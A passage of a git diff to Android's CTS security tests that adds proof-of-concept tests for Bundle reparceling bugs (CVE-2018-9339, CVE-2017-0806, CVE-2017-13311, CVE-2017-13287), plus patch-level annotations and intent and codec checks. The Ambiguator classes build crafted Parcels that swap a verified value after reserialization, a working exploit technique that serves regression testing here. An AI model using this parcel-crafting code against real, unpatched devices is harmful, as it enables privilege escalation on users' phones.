InputStream exploitImage = mContext.getResources().openRawResource(
R.raw.cve_2015_1531_b_19270126);
diff --git a/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java b/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java
index dc74708..ae5bc8e 100644
--- a/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java
+++ b/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java
@@ -22,6 +22,7 @@
import android.os.BaseBundle;
import android.os.Bundle;
import android.os.Parcel;
+import android.os.Parcelable;
import android.annotation.SuppressLint;
import java.io.InputStream;
@@ -33,117 +34,349 @@
public class AmbiguousBundlesTest extends AndroidTestCase {
- @SecurityTest
+ /*
+ * b/71508348
+ */
+ @SecurityTest(minPatchLevel = "2018-06")
+ public void test_android_CVE_2018_9339() throws Exception {
+
+ Ambiguator ambiguator = new Ambiguator() {
+
+ private final Field parcelledDataField;
+
+ private static final String BASE_PARCELABLE = "android.telephony.CellInfo";
+ private final Parcelable smallerParcelable;
+ private final Parcelable biggerParcelable;
+
+ {
+ parcelledDataField = BaseBundle.class.getDeclaredField("mParcelledData");
+ parcelledDataField.setAccessible(true);
+
+ smallerParcelable = (Parcelable) Class.forName("android.telephony.CellInfoGsm").newInstance();
+ biggerParcelable = (Parcelable) Class.forName("android.telephony.CellInfoLte").newInstance();
+
+ Parcel p = Parcel.obtain();
+ smallerParcelable.writeToParcel(p, 0);
+ int smallerParcelableSize = p.dataPosition();
+ biggerParcelable.writeToParcel(p, 0);
+ int biggerParcelableSize = p.dataPosition() - smallerParcelableSize;
+ p.recycle();
+
+ if (smallerParcelableSize >= biggerParcelableSize) {
+ throw new AssertionError("smallerParcelableSize >= biggerParcelableSize");
+ }
+ }
+
+ @Override
+ public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
+ // Find key that has hash below everything else
+ Random random = new Random(1234);
+ int minHash = 0;
+ for (String s : preReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+ for (String s : postReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+
+ String key;
+ int keyHash;
+
+ do {
+ key = randomString(random);
+ keyHash = key.hashCode();
+ } while (keyHash >= minHash);
+
+ // Pad bundles
+ padBundle(postReSerialize, preReSerialize.size() + 1, minHash, random);
+ padBundle(preReSerialize, postReSerialize.size() - 1, minHash, random);
+
+ // Write bundle
+ Parcel parcel = Parcel.obtain();
+
+ parcel.writeInt(preReSerialize.size() + 1); // Num key-value pairs
+ parcel.writeString(key); // Key
+
+ parcel.writeInt(VAL_PARCELABLE);
+ parcel.writeString("android.service.autofill.SaveRequest");
+
+ // read/writeTypedArrayList
+ parcel.writeInt(2); // Number of items in typed array list
+ parcel.writeInt(1); // Item present flag
+ parcel.writeString(BASE_PARCELABLE);
+ biggerParcelable.writeToParcel(parcel, 0);
+ parcel.writeInt(1); // Item present flag
+ smallerParcelable.writeToParcel(parcel, 0);
+
+ // read/writeBundle
+ int bundleLengthPosition = parcel.dataPosition();
+ parcel.writeInt(0); // Placeholder, will be replaced
+ parcel.writeInt(BUNDLE_MAGIC);
+ int bundleStart = parcel.dataPosition();
+ for (int i = 0; i < INNER_BUNDLE_PADDING; i++) {
+ parcel.writeInt(414100 + i); // Padding in inner bundle
+ }
+ parcel.writeInt(-1); // Inner bundle length after re-de-serialization (-1 = null Bundle)
+ writeBundleSkippingHeaders(parcel, postReSerialize);
+ int bundleEnd = parcel.dataPosition();
+
+ // Update inner Bundle length
+ parcel.setDataPosition(bundleLengthPosition);
+ parcel.writeInt(bundleEnd - bundleStart);
+ parcel.setDataPosition(bundleEnd);
+
+ // Write original Bundle contents
+ writeBundleSkippingHeaders(parcel, preReSerialize);
+
+ // Package crafted Parcel into Bundle so it can be used in regular Android APIs
+ parcel.setDataPosition(0);
+ Bundle bundle = new Bundle();
+ parcelledDataField.set(bundle, parcel);
+ return bundle;
+ }
+ };
+
+ testAmbiguator(ambiguator);
+ }
+
+ /*
+ * b/62998805
+ */
+ @SecurityTest(minPatchLevel = "2017-10")
+ public void test_android_CVE_2017_0806() throws Exception {
+ Ambiguator ambiguator = new Ambiguator() {
+ @Override
+ public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
+ Random random = new Random(1234);
+ int minHash = 0;
+ for (String s : preReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+ for (String s : postReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+
+ String key;
+ int keyHash;
+
+ do {
+ key = randomString(random);
+ keyHash = key.hashCode();
+ } while (keyHash >= minHash);
+
+ padBundle(postReSerialize, preReSerialize.size() + 1, minHash, random);
+ padBundle(preReSerialize, postReSerialize.size() - 1, minHash, random);
+
+ String key2;
+ int key2Hash;
+ do {
+ key2 = makeStringToInject(postReSerialize, random);
+ key2Hash = key2.hashCode();
+ } while (key2Hash >= minHash || key2Hash <= keyHash);
+
+
+ Parcel parcel = Parcel.obtain();
+
+ parcel.writeInt(preReSerialize.size() + 2);
+ parcel.writeString(key);
+
+ parcel.writeInt(VAL_PARCELABLE);
+ parcel.writeString("android.service.gatekeeper.GateKeeperResponse");
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+
+ parcel.writeString(key2);
+ parcel.writeInt(VAL_NULL);
+
+ writeBundleSkippingHeaders(parcel, preReSerialize);
+
+ parcel.setDataPosition(0);
+ Bundle bundle = new Bundle();
+ parcelledDataField.set(bundle, parcel);
+ return bundle;
+ }
+ };
+
+ testAmbiguator(ambiguator);
+ }
+
+ /*
+ * b/73252178
+ */
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void test_android_CVE_2017_13311() throws Exception {
+ Ambiguator ambiguator = new Ambiguator() {
+ @Override
+ public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
+ Random random = new Random(1234);
+ int minHash = 0;
+ for (String s : preReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+ for (String s : postReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+
+ String key;
+ int keyHash;
+
+ do {
+ key = randomString(random);
+ keyHash = key.hashCode();
+ } while (keyHash >= minHash);
+
+ padBundle(postReSerialize, preReSerialize.size(), minHash, random);
+ padBundle(preReSerialize, postReSerialize.size(), minHash, random);
+
+ Parcel parcel = Parcel.obtain();
+
+ parcel.writeInt(preReSerialize.size() + 1);
+ parcel.writeString(key);
+
+ parcel.writeInt(VAL_OBJECTARRAY);
+ parcel.writeInt(3);
+
+ parcel.writeInt(VAL_PARCELABLE);
+ parcel.writeString("com.android.internal.app.procstats.ProcessStats");
+
+ parcel.writeInt(PROCSTATS_MAGIC);
+ parcel.writeInt(PROCSTATS_PARCEL_VERSION);
+ parcel.writeInt(PROCSTATS_STATE_COUNT);
+ parcel.writeInt(PROCSTATS_ADJ_COUNT);
+ parcel.writeInt(PROCSTATS_PSS_COUNT);
+ parcel.writeInt(PROCSTATS_SYS_MEM_USAGE_COUNT);
+ parcel.writeInt(PROCSTATS_SPARSE_MAPPING_TABLE_ARRAY_SIZE);
+
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeString(null);
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+ parcel.writeInt(1);
+ parcel.writeInt(1);
+ parcel.writeInt(0);
+
+ for (int i = 0; i < PROCSTATS_ADJ_COUNT; i++) {
+ parcel.writeInt(0);
+ }
+
+ parcel.writeInt(0);
+ parcel.writeInt(1);
+ parcel.writeInt(0);
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+ parcel.writeInt(1);
+ parcel.writeInt(VAL_LONGARRAY);
+ parcel.writeString("AAAAA");
+ parcel.writeInt(0);
+
+ parcel.writeInt(VAL_INTEGER);
+ parcel.writeInt(0);
+ parcel.writeInt(VAL_BUNDLE);
+ parcel.writeBundle(postReSerialize);
+
+ writeBundleSkippingHeaders(parcel, preReSerialize);
+
+ parcel.setDataPosition(0);
+ Bundle bundle = new Bundle();
+ parcelledDataField.set(bundle, parcel);
+ return bundle;
+ }
+ };
+
+ testAmbiguator(ambiguator);
+ }
+
+ /*
+ * b/71714464
+ */
+ @SecurityTest(minPatchLevel = "2018-04")
public void test_android_CVE_2017_13287() throws Exception {
+ Ambiguator ambiguator = new Ambiguator() {
+ @Override
+ public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
+ Random random = new Random(1234);
+ int minHash = 0;
+ for (String s : preReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+ for (String s : postReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+
+ String key;
+ int keyHash;
+
+ do {
+ key = randomString(random);
+ keyHash = key.hashCode();
+ } while (keyHash >= minHash);
+
+ padBundle(postReSerialize, preReSerialize.size() + 1, minHash, random);
+ padBundle(preReSerialize, postReSerialize.size() - 1, minHash, random);
+
+ String key2;
+ int key2Hash;
+ do {
+ key2 = makeStringToInject(postReSerialize, random);
+ key2Hash = key2.hashCode();
+ } while (key2Hash >= minHash || key2Hash <= keyHash);
+
+
+ Parcel parcel = Parcel.obtain();
+
+ parcel.writeInt(preReSerialize.size() + 2);
+ parcel.writeString(key);
+
+ parcel.writeInt(VAL_PARCELABLE);
+ parcel.writeString("com.android.internal.widget.VerifyCredentialResponse");
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+
+ parcel.writeString(key2);
+ parcel.writeInt(VAL_NULL);
+
+ writeBundleSkippingHeaders(parcel, preReSerialize);
+
+ parcel.setDataPosition(0);
+ Bundle bundle = new Bundle();
+ parcelledDataField.set(bundle, parcel);
+ return bundle;
+ }
+ };
+
+ testAmbiguator(ambiguator);
+ }
+
+ private void testAmbiguator(Ambiguator ambiguator) {
Bundle bundle;
- {
- Bundle verifyMe = new Bundle();
- verifyMe.putString("cmd", "something_safe");
- Bundle useMe = new Bundle();
- useMe.putString("cmd", "replaced_thing");
- Ambiguator a = new Ambiguator() {
- @Override
- public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
- Random random = new Random(1234);
- int minHash = 0;
- for (String s : preReSerialize.keySet()) {
- minHash = Math.min(minHash, s.hashCode());
- }
- for (String s : postReSerialize.keySet()) {
- minHash = Math.min(minHash, s.hashCode());
- }
+ Bundle verifyMe = new Bundle();
+ verifyMe.putString("cmd", "something_safe");
+ Bundle useMe = new Bundle();
+ useMe.putString("cmd", "replaced_thing");
- String key;
- int keyHash;
+ try {
+ bundle = ambiguator.make(verifyMe, useMe);
- do {
- key = randomString(random);
- keyHash = key.hashCode();
- } while (keyHash >= minHash);
+ bundle = reparcel(bundle);
+ String value1 = bundle.getString("cmd");
+ bundle = reparcel(bundle);
+ String value2 = bundle.getString("cmd");
- padBundle(postReSerialize, preReSerialize.size() + 1, minHash, random);
- padBundle(preReSerialize, postReSerialize.size() - 1, minHash, random);
-
- String key2;
- int key2Hash;
- do {
- key2 = makeStringToInject(postReSerialize, random);
- key2Hash = key2.hashCode();
- } while (key2Hash >= minHash || key2Hash <= keyHash);
-
-
- Parcel parcel = Parcel.obtain();
-
- parcel.writeInt(preReSerialize.size() + 2);
- parcel.writeString(key);
-
- parcel.writeInt(VAL_PARCELABLE);
- parcel.writeString("com.android.internal.widget.VerifyCredentialResponse");
-
- parcel.writeInt(0);
- parcel.writeInt(0);
-
- parcel.writeString(key2);
- parcel.writeInt(VAL_NULL);
-
- writeBundleSkippingHeaders(parcel, preReSerialize);
-
- parcel.setDataPosition(0);
- Bundle bundle = new Bundle();
- parcelledDataField.set(bundle, parcel);
- return bundle;
- }
-
- @Override
- protected String makeStringToInject(Bundle stuffToInject, Random random) {
- Parcel p = Parcel.obtain();
- p.writeInt(0);
- p.writeInt(0);
-
- Parcel p2 = Parcel.obtain();
- stuffToInject.writeToParcel(p2, 0);
- int p2Len = p2.dataPosition() - BUNDLE_SKIP;
-
- for (int i = 0; i < p2Len / 4 + 4; i++) {
- int paddingVal;
- if (i > 3) {
- paddingVal = i;
- } else {
- paddingVal = random.nextInt();
- }
- p.writeInt(paddingVal);
-
- }
-
- p.appendFrom(p2, BUNDLE_SKIP, p2Len);
- p2.recycle();
-
- while (p.dataPosition() % 8 != 0) p.writeInt(0);
- for (int i = 0; i < 2; i++) {
- p.writeInt(0);
- }
-
- int len = p.dataPosition() / 2 - 1;
- p.writeInt(0); p.writeInt(0);
- p.setDataPosition(0);
- p.writeInt(len);
- p.writeInt(len);
- p.setDataPosition(0);
- String result = p.readString();
- p.recycle();
- return result;
- }
- };
- bundle = a.make(verifyMe, useMe);
- }
-
- bundle = reparcel(bundle);
- String value1 = bundle.getString("cmd");
- bundle = reparcel(bundle);
- String value2 = bundle.getString("cmd");
-
- if (!value1.equals(value2)) {
- fail("String " + value1 + "!=" + value2 + " after reparceling.");
+ if (!value1.equals(value2)) {
+ fail("String " + value1 + "!=" + value2 + " after reparceling.");
+ }
+ } catch (Exception e) {
}
}
@@ -159,10 +392,26 @@
static abstract class Ambiguator {
- protected static final int VAL_PARCELABLE = 4;
protected static final int VAL_NULL = -1;
+ protected static final int VAL_INTEGER = 1;
+ protected static final int VAL_BUNDLE = 3;
+ protected static final int VAL_PARCELABLE = 4;
+ protected static final int VAL_OBJECTARRAY = 17;
+ protected static final int VAL_INTARRAY = 18;
+ protected static final int VAL_LONGARRAY = 19;
protected static final int BUNDLE_SKIP = 12;
+ protected static final int PROCSTATS_MAGIC = 0x50535454;
+ protected static final int PROCSTATS_PARCEL_VERSION = 21;
+ protected static final int PROCSTATS_STATE_COUNT = 14;
+ protected static final int PROCSTATS_ADJ_COUNT = 8;
+ protected static final int PROCSTATS_PSS_COUNT = 7;
+ protected static final int PROCSTATS_SYS_MEM_USAGE_COUNT = 16;
+ protected static final int PROCSTATS_SPARSE_MAPPING_TABLE_ARRAY_SIZE = 4096;
+
+ protected static final int BUNDLE_MAGIC = 0x4C444E42;
+ protected static final int INNER_BUNDLE_PADDING = 1;
+
protected final Field parcelledDataField;
public Ambiguator() throws Exception {
@@ -172,7 +421,44 @@
abstract public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception;
- abstract protected String makeStringToInject(Bundle stuffToInject, Random random);
+ protected String makeStringToInject(Bundle stuffToInject, Random random) {
+ Parcel p = Parcel.obtain();
+ p.writeInt(0);
+ p.writeInt(0);
+
+ Parcel p2 = Parcel.obtain();
+ stuffToInject.writeToParcel(p2, 0);
+ int p2Len = p2.dataPosition() - BUNDLE_SKIP;
+
+ for (int i = 0; i < p2Len / 4 + 4; i++) {
+ int paddingVal;
+ if (i > 3) {
+ paddingVal = i;
+ } else {
+ paddingVal = random.nextInt();
+ }
+ p.writeInt(paddingVal);
+
+ }
+
+ p.appendFrom(p2, BUNDLE_SKIP, p2Len);
+ p2.recycle();
+
+ while (p.dataPosition() % 8 != 0) p.writeInt(0);
+ for (int i = 0; i < 2; i++) {
+ p.writeInt(0);
+ }
+
+ int len = p.dataPosition() / 2 - 1;
+ p.writeInt(0); p.writeInt(0);
+ p.setDataPosition(0);
+ p.writeInt(len);
+ p.writeInt(len);
+ p.setDataPosition(0);
+ String result = p.readString();
+ p.recycle();
+ return result;
+ }
protected static void writeBundleSkippingHeaders(Parcel parcel, Bundle bundle) {
Parcel p2 = Parcel.obtain();
diff --git a/tests/tests/security/src/android/security/cts/AudioSecurityTest.java b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
index 3495191..56cff46 100644
--- a/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
+++ b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
@@ -90,6 +90,7 @@
}
// b/28173666
+ @SecurityTest(minPatchLevel = "2016-07")
public void testAllEffectsGetParameterAttemptOffload_CVE_2016_3745() throws Exception {
testAllEffects("get parameter attempt offload",
new TestEffect() {
@@ -103,6 +104,7 @@
// b/32438594
// b/32624850
// b/32635664
+ @SecurityTest(minPatchLevel = "2017-03")
public void testAllEffectsGetParameter2AttemptOffload_CVE_2017_0398() throws Exception {
testAllEffects("get parameter2 attempt offload",
new TestEffect() {
@@ -114,6 +116,7 @@
}
// b/30204301
+ @SecurityTest(minPatchLevel = "2016-10")
public void testAllEffectsSetParameterAttemptOffload_CVE_2016_3924() throws Exception {
testAllEffects("set parameter attempt offload",
new TestEffect() {
@@ -125,6 +128,7 @@
}
// b/37536407
+ @SecurityTest(minPatchLevel = "2017-01")
public void testAllEffectsEqualizer_CVE_2017_0401() throws Exception {
testAllEffects("equalizer get parameter name",
new TestEffect() {
@@ -351,6 +355,7 @@
private static final int VISUALIZER_PARAM_CAPTURE_SIZE = 0;
// b/31781965
+ @SecurityTest(minPatchLevel = "2017-03")
public void testVisualizerCapture_CVE_2017_0396() throws Exception {
// Capture params
final int CAPTURE_SIZE = 1 << 24; // 16MB seems to be large enough to cause a SEGV.
diff --git a/tests/tests/security/src/android/security/cts/BannedFilesTest.java b/tests/tests/security/src/android/security/cts/BannedFilesTest.java
index 8847a84..46b5ba9 100644
--- a/tests/tests/security/src/android/security/cts/BannedFilesTest.java
+++ b/tests/tests/security/src/android/security/cts/BannedFilesTest.java
@@ -148,6 +148,24 @@
assertNotSetugid("/vendor/bin/tcpdump-arm");
}
+ /**
+ * enforce that the xaac codec has not been included on the device
+ */
+ public void testNoXaac() {
+ String libraries[] = new String[] {
+ "libstagefright_soft_xaacdec.so", "libstagefright_soft_c2xaacdec.so"
+ };
+ String directories[] = new String[] {
+ "/system/lib", "/system/lib64", "/vendor/lib", "/vendor/lib64"
+ };
+ for (String f : libraries) {
+ for (String d : directories) {
+ String fullPath = d + "/" + f;
+ assertFalse(fullPath, new File(fullPath).exists());
+ }
+ }
+ }
+
private static void assertNotSetugid(String file) {
FileUtils.FileStatus fs = new FileUtils.FileStatus();
if (!FileUtils.getFileStatus(file, fs, false)) {
diff --git a/tests/tests/security/src/android/security/cts/BigRleTest.java b/tests/tests/security/src/android/security/cts/BigRleTest.java
index f3c2302..bcfb1df 100644
--- a/tests/tests/security/src/android/security/cts/BigRleTest.java
+++ b/tests/tests/security/src/android/security/cts/BigRleTest.java
@@ -22,6 +22,7 @@
import java.io.InputStream;
+import android.platform.test.annotations.SecurityTest;
import android.security.cts.R;
public class BigRleTest extends AndroidTestCase {
@@ -31,6 +32,7 @@
* This image reports that its encoded length is over 4 gigs. Prior to fixing issue 33251605,
* we attempted to allocate space for all the encoded data at once, resulting in OOM.
*/
+ @SecurityTest(minPatchLevel = "2017-04")
public void test_android_bug_33251605() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33251605);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
diff --git a/tests/tests/security/src/android/security/cts/BitmapFactoryDecodeStreamTest.java b/tests/tests/security/src/android/security/cts/BitmapFactoryDecodeStreamTest.java
index 1fa0b65..ce28a7a 100644
--- a/tests/tests/security/src/android/security/cts/BitmapFactoryDecodeStreamTest.java
+++ b/tests/tests/security/src/android/security/cts/BitmapFactoryDecodeStreamTest.java
@@ -33,6 +33,7 @@
* to heap corruption by trying to open a crafted PNG image with incorrect
* npTc chunk.
*/
+ @SecurityTest(minPatchLevel = "2015-01")
public void testNinePatchHeapOverflow() throws Exception {
InputStream inStream = new BufferedInputStream(mContext.getResources().openRawResource(
R.raw.cve_2015_1532));
@@ -40,13 +41,14 @@
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testPocCVE_2017_0691() throws Exception {
InputStream exploitImage = new BufferedInputStream(mContext.getResources().openRawResource(
R.raw.cve_2017_0691));
BitmapFactory.decodeStream(exploitImage);
}
+ @SecurityTest(minPatchLevel = "2017-12")
public void test_b65290323() throws Exception {
InputStream exploitImage = new BufferedInputStream(mContext.getResources().openRawResource(
R.raw.b65290323));
diff --git a/tests/tests/security/src/android/security/cts/BitmapFactorySecurityTests.java b/tests/tests/security/src/android/security/cts/BitmapFactorySecurityTests.java
index 2272dc0..8ffe485 100644
--- a/tests/tests/security/src/android/security/cts/BitmapFactorySecurityTests.java
+++ b/tests/tests/security/src/android/security/cts/BitmapFactorySecurityTests.java
@@ -58,6 +58,7 @@
/**
* Verifies that decoding a corrupt ICO does crash.
*/
+ @SecurityTest(minPatchLevel = "2017-09")
public void test_android_bug_38116746() {
FileDescriptor exploitImage = getResource(R.raw.bug_38116746);
try {
@@ -73,6 +74,7 @@
/**
* Verifies that decoding a corrupt BMP does crash.
*/
+ @SecurityTest(minPatchLevel = "2017-08")
public void test_android_bug_37627194() {
FileDescriptor exploitImage = getResource(R.raw.bug_37627194);
try {
diff --git a/tests/tests/security/src/android/security/cts/BitmapTest.java b/tests/tests/security/src/android/security/cts/BitmapTest.java
index 6253f0a..632ab96 100644
--- a/tests/tests/security/src/android/security/cts/BitmapTest.java
+++ b/tests/tests/security/src/android/security/cts/BitmapTest.java
@@ -33,6 +33,7 @@
* OOME is more appropriate.
*/
@Test(expected=OutOfMemoryError.class)
+ @SecurityTest(minPatchLevel = "2018-01")
public void test_33846679() {
// This size is based on the max size possible in a GIF file,
// which might be passed to createBitmap from a Java decoder.
diff --git a/tests/tests/security/src/android/security/cts/BluetoothIntentsTest.java b/tests/tests/security/src/android/security/cts/BluetoothIntentsTest.java
new file mode 100644
index 0000000..6a4990f
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/BluetoothIntentsTest.java
@@ -0,0 +1,61 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts;
+
+import org.junit.Test;
+
+import android.content.ComponentName;
+import android.content.Intent;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+
+@SecurityTest
+public class BluetoothIntentsTest extends AndroidTestCase {
+ /**
+ * b/35258579
+ */
+ @SecurityTest
+ public void testAcceptIntent() {
+ genericIntentTest("ACCEPT");
+ }
+
+ /**
+ * b/35258579
+ */
+ @SecurityTest
+ public void testDeclineIntent() {
+ genericIntentTest("DECLINE");
+ }
+
+ private static final String prefix = "android.btopp.intent.action.";
+ private void genericIntentTest(String action) throws SecurityException {
+ try {
+ Intent should_be_protected_broadcast = new Intent();
+ should_be_protected_broadcast.setComponent(
+ new ComponentName("com.android.bluetooth",
+ "com.android.bluetooth.opp.BluetoothOppReceiver"));
+ should_be_protected_broadcast.setAction(prefix + action);
+ mContext.sendBroadcast(should_be_protected_broadcast);
+ }
+ catch (SecurityException e) {
+ return;
+ }
+
+ throw new SecurityException("An " + prefix + action +
+ " intent should not be broadcastable except by the system (declare " +
+ " as protected-broadcast in manifest)");
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/BrowserTest.java b/tests/tests/security/src/android/security/cts/BrowserTest.java
index de8763e..becbc5e 100644
--- a/tests/tests/security/src/android/security/cts/BrowserTest.java
+++ b/tests/tests/security/src/android/security/cts/BrowserTest.java
@@ -138,6 +138,7 @@
/**
* See Bug 6212665 for detailed information about this issue.
*/
+ @SecurityTest(minPatchLevel = "2012-01")
public void testBrowserPrivateDataAccess() throws Throwable {
// Yucky workaround to let us launch file:// Uris
StrictMode.setVmPolicy(new StrictMode.VmPolicy.Builder().build());
diff --git a/tests/tests/security/src/android/security/cts/DecodeTest.java b/tests/tests/security/src/android/security/cts/DecodeTest.java
index 0e92310..3314166 100644
--- a/tests/tests/security/src/android/security/cts/DecodeTest.java
+++ b/tests/tests/security/src/android/security/cts/DecodeTest.java
@@ -32,7 +32,7 @@
* Prior to fixing bug 34778578, decoding this file would crash. Instead, it should fail to
* decode.
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void test_android_bug_34778578() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_34778578);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
@@ -45,7 +45,7 @@
* Prior to fixing bug 67381469, decoding this file would crash. Instead, it should fail to
* decode.
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-12")
public void test_android_bug_67381469() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_67381469);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
diff --git a/tests/tests/security/src/android/security/cts/EffectBundleTest.java b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
index ae55494..d1baf37 100644
--- a/tests/tests/security/src/android/security/cts/EffectBundleTest.java
+++ b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
@@ -48,6 +48,7 @@
private static final int intSize = 4;
//Testing security bug: 32436341
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamCenterFreq() throws Exception {
if (!hasEqualizer()) {
return;
@@ -57,6 +58,7 @@
}
//Testing security bug: 32588352
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamCenterFreq_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -65,6 +67,7 @@
}
//Testing security bug: 32438598
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamBandLevel() throws Exception {
if (!hasEqualizer()) {
return;
@@ -73,6 +76,7 @@
}
//Testing security bug: 32584034
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamBandLevel_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -81,6 +85,7 @@
}
//Testing security bug: 32247948
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamFreqRange() throws Exception {
if (!hasEqualizer()) {
return;
@@ -90,6 +95,7 @@
}
//Testing security bug: 32588756
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamFreqRange_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -99,6 +105,7 @@
}
//Testing security bug: 32448258
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamPresetName() throws Exception {
if (!hasEqualizer()) {
return;
@@ -107,6 +114,7 @@
}
//Testing security bug: 32588016
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamPresetName_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -147,6 +155,7 @@
}
//testing security bug: 32095626
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_setParamBandLevel() throws Exception {
if (!hasEqualizer()) {
return;
@@ -162,6 +171,7 @@
}
//testing security bug: 32585400
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_setParamBandLevel_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -177,6 +187,7 @@
}
//testing security bug: 32705438
+ @SecurityTest(minPatchLevel = "2017-02")
public void testEqualizer_getParamFreqRangeCommand_short() throws Exception {
if (!hasEqualizer()) {
return;
@@ -186,6 +197,7 @@
}
//testing security bug: 32703959
+ @SecurityTest(minPatchLevel = "2017-02")
public void testEqualizer_getParamFreqRangeCommand_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -195,6 +207,7 @@
}
//testing security bug: 37563371 (short media)
+ @SecurityTest(minPatchLevel = "2017-09")
public void testEqualizer_setParamProperties_short() throws Exception {
if (!hasEqualizer()) {
return;
@@ -204,6 +217,7 @@
}
//testing security bug: 37563371 (long media)
+ @SecurityTest(minPatchLevel = "2017-09")
public void testEqualizer_setParamProperties_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -213,7 +227,7 @@
}
//Testing security bug: 63662938
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-10")
public void testDownmix_setParameter() throws Exception {
verifyZeroPVSizeRejectedForSetParameter(
EFFECT_TYPE_DOWNMIX, new int[] { DOWNMIX_PARAM_TYPE });
@@ -229,7 +243,7 @@
private static final int DOWNMIX_PARAM_TYPE = 0;
//Testing security bug: 63526567
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-10")
public void testEnvironmentalReverb_setParameter() throws Exception {
verifyZeroPVSizeRejectedForSetParameter(
AudioEffect.EFFECT_TYPE_ENV_REVERB, new int[] {
@@ -249,7 +263,7 @@
}
//Testing security bug: 67647856
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testPresetReverb_setParameter() throws Exception {
verifyZeroPVSizeRejectedForSetParameter(
AudioEffect.EFFECT_TYPE_PRESET_REVERB, new int[] {
diff --git a/tests/tests/security/src/android/security/cts/IsolatedProcessTest.java b/tests/tests/security/src/android/security/cts/IsolatedProcessTest.java
index 1759521..2be37bb 100644
--- a/tests/tests/security/src/android/security/cts/IsolatedProcessTest.java
+++ b/tests/tests/security/src/android/security/cts/IsolatedProcessTest.java
@@ -27,7 +27,6 @@
import android.security.cts.IsolatedService;
import android.test.AndroidTestCase;
import android.util.Log;
-import com.android.compatibility.common.util.CddTest;
import com.android.internal.util.ArrayUtils;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.TimeUnit;
@@ -75,9 +74,7 @@
mLatch.await(BIND_SERVICE_TIMEOUT, TimeUnit.MILLISECONDS));
}
-
@SecurityTest
- @CddTest(requirement="9.2/C-0-1")
public void testGetCachedServicesFromIsolatedService() throws RemoteException {
String[] cachedServices = mService.getCachedSystemServices();
for (String serviceName : cachedServices) {
@@ -86,9 +83,7 @@
}
}
-
@SecurityTest
- @CddTest(requirement="9.2/C-0-1")
public void testGetServiceFromIsolatedService() throws RemoteException {
